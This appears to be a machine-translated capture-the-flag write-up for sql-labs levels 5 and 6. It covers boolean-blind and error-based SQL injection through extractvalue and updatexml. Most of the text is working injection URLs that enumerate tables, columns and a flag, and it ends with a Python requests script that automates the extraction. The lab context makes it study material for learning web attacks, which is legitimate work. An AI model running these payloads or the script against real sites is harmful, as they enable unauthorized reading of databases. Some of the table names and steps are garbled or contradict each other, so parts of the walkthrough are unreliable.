title: 2022-07-08sql-labs Customs clearance notes

grammar_cjkRuby: true

sql-5

Method 1 Boolean blind note

Try to determine the injection type

https://1405-2c2eea07-ccdd-4d2d-ba8b-9124b54dde23.do-not-trust.hacking.run/?id=1’ and 1=1 --+ Determine the character type injection

Query the data table under the current database

Judge the length of the data table name

https://1405-2c2eea07-ccdd-4d2d-ba8b-9124b54dde23.do-not-trust.hacking.run/?id=1' and 1=if(length((select table_name from information_schema.tables where table_schema=database() limit {},1))>{},1,0) --+

The first brace is the table of judgment , The second brace is the length of the table name
Blast table name

https://1405-2c2eea07-ccdd-4d2d-ba8b-9124b54dde23.do-not-trust.hacking.run/?id=1' and 1=if(ascii(mid((select table_name from information_schema.tables where table_schema=database() limit {},1),{},1))={},1,0) --+

The first brace is the number of data tables guessed from 0 Start , The second brace is the number of digits of the data table name , The third brace is the guessing character
Blasting out :emails,p5jeT0XK(id,flag), stay p5jeT0XK in flag Field

Guess the field name

Determine the field length

https://1405-2c2eea07-ccdd-4d2d-ba8b-9124b54dde23.do-not-trust.hacking.run/?id=1' and 1=if(length((select flag from p5jeT0XK limit 3,1))>40,1,0) --+

https://1405-2c2eea07-ccdd-4d2d-ba8b-9124b54dde23.do-not-trust.hacking.run/?id=1' and 1=if(ascii(mid((select column_name from information_schema.columns where table_name=p5jeT0XK limit {},1),{},1))={},1,0) --+

The first brace is the number of fields , The second brace is the first few letters of the field , The third character is guessing
Blasting out :emails,p5jeT0XK(id,flag), stay p5jeT0XK in flag Field

Inquire about flag

https://1405-2c2eea07-ccdd-4d2d-ba8b-9124b54dde23.do-not-trust.hacking.run/?id=1' and 1=if(ascii(mid((select flag from p5jeT0XK limit 3,1),{},1))={},1,0) --+

Finally found flag by PTB{90f03b1e-b289-4072-b3a1-87b0b6b82986}

Method 2 error injection

There are many ways to inject errors , Here is a demonstration of
xpath Grammar mistakes
utilize xpath Syntax error is mainly used to inject error extractvalue and updatexml Two functions .

extractvalue function
The function prototype ：extractvalue(xml_document,Xpath_string)
Normal grammar ：extractvalue(xml_document,Xpath_string);
The first parameter ：xml_document yes string Format , by xml The name of the document object
The second parameter ：Xpath_string yes xpath Format string
effect ： From the target xml Returns the string containing the value of the query
The second parameter is the requirement to meet xpath Syntax string , If the requirements are not met , May be an error , And put the query results in the error message , So you can use

updatexml(xml_doument,XPath_string,new_value)
The first parameter ：XML The content of
The second parameter ： Is the need to update The location of XPATH route
The third parameter ： Is the updated content
So the first and third parameters can be written casually , Just use the second parameter , He will check whether the content you enter matches XPATH Format
I understand the function and Syntax , Injected below payload It's clear
extractvalue and updatexml Function can only output 32 Bytes , Use substring Function to segment
substring(1,2), The first parameter is the intercepted content , The second parameter is the number of bits intercepted

Burst the database name

https://1405-2c2eea07-ccdd-4d2d-ba8b-9124b54dde23.do-not-trust.hacking.run/?id=1' and (select extractvalue(1,concat('~',(select database()))))--+

Explode the table under the current database

https://1405-2c2eea07-ccdd-4d2d-ba8b-9124b54dde23.do-not-trust.hacking.run/?id=1' and (select extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()))))--+

The result is ~emails,p5jeT0XK,referers,uagent

when p5jeT0XK The fields under the table

https://1405-2c2eea07-ccdd-4d2d-ba8b-9124b54dde23.do-not-trust.hacking.run/?id=1' and (select extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='p5jeT0XK')))) --+

The result is ~id,flag

see p5jeT0XK Below the table flag

At this time, we need to pay attention to a problem ,extractvalue() The maximum length of the query string is 32, If we want more results than 32, To use substring() Function intercept or limit Pagination , View at most at one time 32 position #F44336

https://1405-2c2eea07-ccdd-4d2d-ba8b-9124b54dde23.do-not-trust.hacking.run/?id=1' and (select extractvalue (1,concat('~',substring((select flag from p5jeT0XK limit 3,1),20)))) --+

Get complete by changing the number of digits flagPTB{90f03b1e-b289-4072-b3a1-87b0b6b82986}

sql-6

Try injecting type

https://1405-0391aac1-b73f-4689-b4ec-72f35c614764.do-not-trust.hacking.run/
?id=1 and 1=2 Judge whether it is digital injection , Echo normal , exclude
https://1405-0391aac1-b73f-4689-b4ec-72f35c614764.do-not-trust.hacking.run/
?id=1’ Determine whether it is character injection , Echo no error
https://1405-0391aac1-b73f-4689-b4ec-72f35c614764.do-not-trust.hacking.run/
?id=1" and 1=2 Determine whether it is a special symbol , Try parentheses and double quotes to return an error when a single double quote , It can be judged that double quotation marks include id

The guess query statement is as follows
select * from database() ‘“.id.”’ limit 0,1;

Test database name

The method used is Boolean blind annotation , Other methods can also be used for injection
Use mid Intercept the character located in the second finger

https://1405-0391aac1-b73f-4689-b4ec-72f35c614764.do-not-trust.hacking.run/
?id=1" and 1=if(mid(database(),1,1)='s',1,0) --+

Judge whether the first place is s, When it comes to s You can guess , The database name is security, No downward blasting is required

Judge the table under the database

Judge the length of the data table name

https://1405-0391aac1-b73f-4689-b4ec-72f35c614764.do-not-trust.hacking.run/?id=1" and 1=if(length((select table_name from information_schema.tables where table_schema='security' limit {},1))>{
    },1,0)--+

The first brace is the name of the data table to be judged , The second is the length of interpretation

https://1405-0391aac1-b73f-4689-b4ec-72f35c614764.do-not-trust.hacking.run/?id=1\" and 1=if(ascii(mid((select table_name from information_schema.tables where table_schema='security' limit {},1),{},1))='{}',1,0) --+

The first brace is the number of data tables guessed from 0 Start , The second brace is the number of digits of the data table name , The third brace is the guessing character
The first data table that pops up is emil The second database is called YS8SI4vt guess flag In this data sheet , Further query the field name of the data table

Query data table field name

https://1405-0391aac1-b73f-4689-b4ec-72f35c614764.do-not-trust.hacking.run/?id=1\" and 1=if(ascii(mid((select column_name from information_schema.columns where table_name='referers' limit {},1),{},1))={
    },1,0) --+

The first brace is the number of fields , The second brace is the first few letters of the field , The third character is guessing , One of the blasting field names is flag, Then query the field content

Inquire about flag

https://1405-f2a10766-01f3-406d-b8e3-07550c6bfdfe.do-not-trust.hacking.run/?id=1" and (select updatexml(1,concat('~',substring((select flag from YS8SI4vt limit 3,1),20)),1))--+

Error reporting injection is used , Because Boolean blind injection is a waste of time , Have to say , It is easier to report an error and inject
To facilitate injection python Script

import requests
from lxml import etree
# Bull's blind note 
def bind_1():
    table_name=[]
    for m in range(40,43):
        for i in range(48,126):
            url = "https://1405-2c2eea07-ccdd-4d2d-ba8b-9124b54dde23.do-not-trust.hacking.run/?id=1' and 1=if(ascii(mid((select flag from p5jeT0XK limit 3,1),{},1))={},1,0) --+".format(m,i)
            res=requests.get(url)
            # print(res.text)
            print(" Testing section {} First paragraph {} strip ".format(m,i))
            if "You are in..........." in res.text:
               table_name.append(chr(i))
               print("".join(table_name))
               break
    print("".join(table_name))
# An error injection 
def bind_2():
    for i in range(5):
        url="https://1405-f2a10766-01f3-406d-b8e3-07550c6bfdfe.do-not-trust.hacking.run/?id=1\" and (select updatexml(1,concat('~',(select flag from YS8SI4vt limit {},1)),1))--+".format(i)
        res=requests.get(url).text
        html=etree.HTML(res)
        content=html.xpath("/html/body/div[1]/font[2]/font[1]/text()")
        print(content)
if __name__ == '__main__':
    bind_2()

Reference resources https://blog.csdn.net/silence1_/article/details/90812612
https://blog.csdn.net/m0_60988110/article/details/123544853